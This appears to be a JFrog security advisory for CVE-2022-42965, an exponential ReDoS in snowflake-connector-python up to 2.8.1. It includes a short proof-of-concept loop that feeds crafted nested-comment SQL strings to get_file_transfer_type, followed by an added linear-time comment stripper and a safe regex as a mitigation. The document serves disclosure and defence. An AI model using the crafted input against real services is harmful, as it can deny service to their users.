JFrog Security Research

XRAY-257185 - snowflake-connector-python ReDoS

CVE-2022-42965 | CVSS 3.7

JFrog Severity: low

Discovered by Denys Vozniuk of the JFrog Security Research Team

Published 15 Oct, 2022 | Last updated 20 Nov, 2022

Exponential ReDoS in snowflake-connector-python leads to denial of service

snowflake-connector-python

Vulnerable versions: snowflake-connector-python (,2.8.1] (all versions up to and including 2.8.1); fixed in 2.8.2

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package when an attacker is able to supply arbitrary input to the undocumented get_file_transfer_type method of SnowflakeCursor. The following proof of concept measures the time taken by the method as the number of repeated comment fragments in the input grows:

import time
from snowflake.connector.cursor import SnowflakeCursor

# Each iteration adds one more comment fragment to the input; on versions
# <= 2.8.1 the time taken by get_file_transfer_type grows exponentially with i.
for i in range(100):
    start_time = time.time()
    sql = '/**/\n' + '\t/*/get\t*/\t/**/\n'*i + '\t*/get\n'
    SnowflakeCursor.get_file_transfer_type(sql)
    print("--- %s seconds ---" % (time.time() - start_time))

No mitigations are supplied for this issue
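Since the advisory lists no vendor mitigation, here is an added example (not JFrog's or the connector's code; the connector's actual regular expression is not shown on this page) of how a caller can decide the leading PUT/GET keyword in linear time: comments are removed by a single-pass scanner, and only then is an anchored pattern with no nested quantifiers applied. The function names and the standard /* */ and -- comment syntax are assumptions; the PoC input shape is reconstructed from the snippet above.

```python
import re
from typing import Optional


def strip_sql_comments(sql: str) -> str:
    """Remove /* */ block comments and -- line comments in one O(n) pass.

    Assumption: comments do not nest, and quoted strings are not tracked
    because only the statement's leading keyword is of interest here.
    """
    out = []
    i, n = 0, len(sql)
    while i < n:
        if sql.startswith("/*", i):
            end = sql.find("*/", i + 2)   # "/*/" does not close itself
            if end == -1:
                break                     # unterminated comment: drop the rest
            i = end + 2
        elif sql.startswith("--", i):
            end = sql.find("\n", i)
            i = n if end == -1 else end   # keep the newline itself
        else:
            out.append(sql[i])
            i += 1
    return "".join(out)


# Anchored and without nested quantifiers, so it cannot backtrack exponentially.
FILE_TRANSFER_RE = re.compile(r"^\s*(put|get)\s", re.IGNORECASE)


def file_transfer_type(sql: str) -> Optional[str]:
    """Return "PUT", "GET" or None depending on the statement's first keyword."""
    m = FILE_TRANSFER_RE.match(strip_sql_comments(sql))
    return m.group(1).upper() if m else None


def poc_input(i: int) -> str:
    """The advisory's PoC input shape, reconstructed here as test input."""
    return "/**/\n" + "\t/*/get\t*/\t/**/\n" * i + "\t*/get\n"


if __name__ == "__main__":
    import time
    for i in (10, 1000, 100000):
        start = time.time()
        result = file_transfer_type(poc_input(i))
        print(f"i={i}: {result} in {time.time() - start:.4f}s")  # grows linearly
```

The stripped PoC input starts with "*/get", so it is correctly classified as not a file transfer, and the check finishes in milliseconds even for very large repetition counts.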

NVD
